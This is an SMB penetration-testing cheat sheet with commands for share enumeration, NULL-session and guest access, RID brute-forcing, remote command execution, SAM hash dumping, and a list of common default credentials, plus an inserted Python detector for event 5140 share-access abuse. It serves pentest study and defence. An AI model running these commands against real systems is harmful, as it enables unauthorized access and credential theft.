SMB
Introduction
Server Message Block (SMB) is a client-server protocol that regulates access to files, entire directories, and other network resources.
The SMB protocol enables the client to communicate with other participants in the same network to access files or services shared with it on the network.
An SMB server can provide arbitrary parts of its local file system as shares.
Access rights are defined by Access Control Lists (ACL).
SMB runs on port 445 TCP by default.
SMB Shares Enumeration
Run Snaffler from a Windows host to find useful data in shares:
.\Snaffler.exe -d INLANEFREIGHT.LOCAL -s -v data
Run Scavenger from a Linux host to find useful data in shares:
python3 ./scavenger.py smb -t 10.0.0.10 -u administrator -p Password123 -d testdomain.local
Shares enumeration from Windows:
net view \\MachineName /all
CME Shares Enumeration from Linux:
sudo crackmapexec smb 172.16.5.5 -u validuser -p validpassword --shares
CME Share Spidering from Linux:
sudo crackmapexec smb 172.16.5.5 -u validuser -p validpassword -M spider_plus --share sharename
SMBMap Share Enumeration from Linux:
smbmap -u validuser -p validpassword -d INLANEFREIGHT.LOCAL -H 172.16.5.5
SMBMap Share Recursive Directory Listing from Linux:
smbmap -u validuser -p validpassword -d INLANEFREIGHT.LOCAL -H 172.16.5.5 -R SHARENAME --dir-only
Download Shares Recursively from Linux:
smbget -u guest -R smb://10.129.8.111/Development/
SMB NULL Session, Guest and Common Credentials Authentication
Guest Authentication:
enum4linux -a -u "guest" -p "" <DC IP>
Guest Authentication:
smbmap -u "guest" -p "" -P 445 -H <DC IP>
Guest Authentication:
smbclient -U '%' -L //<DC IP> && smbclient -U 'guest%' -L //<DC IP>
NULL Session:
smbclient -N -L //<FQDN/IP>
NULL Session:
crackmapexec smb <FQDN/IP> --shares -u '' -p ''
NULL Session:
smbmap -u "" -p "" -P 445 -H <DC IP>
NULL Session:
enum4linux -a -u "" -p "" <DC IP>
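The NULL session, guest authentication and share-spidering commands above all leave a trace on the file server as Windows Security event 5140 (a network share object was accessed). The following added example, not part of the original cheat sheet, flags that activity in a set of constructed 5140 records: any share access by ANONYMOUS LOGON or Guest, and any source address touching several distinct shares inside a short window. The pipe-separated record format, the IPs, account names and thresholds are assumptions made for the example.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Accounts whose share access means a NULL session or guest authentication.
UNAUTHENTICATED_ACCOUNTS = {"ANONYMOUS LOGON", "GUEST"}

# Constructed event 5140 records: "timestamp|account|domain|source_ip|share".
# Not real telemetry; a SIEM export would carry the same fields.
SAMPLE_EVENTS = r"""
2024-05-01T10:00:01|ANONYMOUS LOGON|NT AUTHORITY|10.10.110.50|\\*\IPC$
2024-05-01T10:00:02|ANONYMOUS LOGON|NT AUTHORITY|10.10.110.50|\\*\Development
2024-05-01T10:00:02|ANONYMOUS LOGON|NT AUTHORITY|10.10.110.50|\\*\SYSVOL
2024-05-01T10:00:03|ANONYMOUS LOGON|NT AUTHORITY|10.10.110.50|\\*\NETLOGON
2024-05-01T10:15:40|Guest|INLANEFREIGHT|10.10.110.51|\\*\Development
2024-05-01T11:02:10|jsmith|INLANEFREIGHT|10.10.110.20|\\*\Development
2024-05-01T11:02:11|jsmith|INLANEFREIGHT|10.10.110.20|\\*\IT
2024-05-01T11:02:11|jsmith|INLANEFREIGHT|10.10.110.20|\\*\HR
2024-05-01T11:02:12|jsmith|INLANEFREIGHT|10.10.110.20|\\*\Finance
2024-05-01T11:02:12|jsmith|INLANEFREIGHT|10.10.110.20|\\*\Backups
2024-05-01T14:30:00|jsmith|INLANEFREIGHT|10.10.110.20|\\*\Development
"""

def parse_events(text):
    """Turn the pipe-separated records into dicts with a parsed timestamp."""
    events = []
    for line in text.strip().splitlines():
        ts, account, domain, src, share = line.split("|")
        events.append({"ts": datetime.fromisoformat(ts), "account": account,
                       "domain": domain, "src": src, "share": share})
    return events

def find_unauthenticated_access(events):
    """Rule 1: any share access by ANONYMOUS LOGON or Guest is a finding."""
    return sorted({(e["src"], e["account"]) for e in events
                   if e["account"].upper() in UNAUTHENTICATED_ACCOUNTS})

def find_share_spidering(events, min_shares=4, window=timedelta(minutes=5)):
    """Rule 2: one source touching min_shares distinct shares inside `window`
    looks like recursive share enumeration rather than normal file use."""
    by_src = defaultdict(list)
    for e in sorted(events, key=lambda e: e["ts"]):
        by_src[e["src"]].append(e)
    findings = []
    for src, evs in by_src.items():
        for i, start in enumerate(evs):
            shares = {e["share"] for e in evs[i:] if e["ts"] - start["ts"] <= window}
            if len(shares) >= min_shares:
                findings.append((src, len(shares)))
                break
    return findings
```

Tune min_shares and window to the server: a domain controller sees every workstation touch SYSVOL and NETLOGON, so count only non-default shares there.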
Check for common SMB credentials, as listed below.
Common SMB Credentials
Source: https://book.hacktricks.xyz/network-services-pentesting/pentesting-smb#possible-credentials
Username(s) | Password(s)
(blank) | (blank)
guest | (blank)
Administrator, admin | (blank), password, administrator, admin
arcserve | arcserve, backup
tivoli, tmersrvd | tivoli, tmersrvd, admin
backupexec, backup | backupexec, backup, arcada
test, lab, demo | password, test, lab, demo
Enumerating SMB via RPC Client
The rpcclient utility offers many different requests that execute specific functions on the SMB server to retrieve information. The most useful ones:
srvinfo
Server information.
enumdomains
Enumerate all domains that are deployed in the network.
querydominfo
Provides domain, server, and user information of deployed domains.
netshareenumall
Enumerates all available shares.
netsharegetinfo
Provides information about a specific share.
enumdomusers
Enumerates all domain users.
queryuser
Provides information about a specific user.
Bruteforcing user RIDs:
Oneliner (queryuser takes the RID in hexadecimal, hence the printf '%x' conversion):
for i in $(seq 500 1100);do rpcclient -N -U "" 10.129.14.128 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done
Impacket Samrdump:
samrdump.py 10.129.14.128
CrackMapExec (CME) Utilities
Run commands with CrackMapExec:
crackmapexec smb 10.10.110.17 -u Administrator -p 'Password123!' -x 'whoami' --exec-method smbexec
Enumerate logged on users with CrackMapExec:
crackmapexec smb 10.10.110.0/24 -u administrator -p 'Password123!' --loggedon-users
Extract Hashes from the SAM Database with CrackMapExec:
crackmapexec smb 10.10.110.17 -u administrator -p 'Password123!' --sam
Enumerate Password Policies:
crackmapexec smb 172.16.5.5 -u validuser -p validpass --pass-pol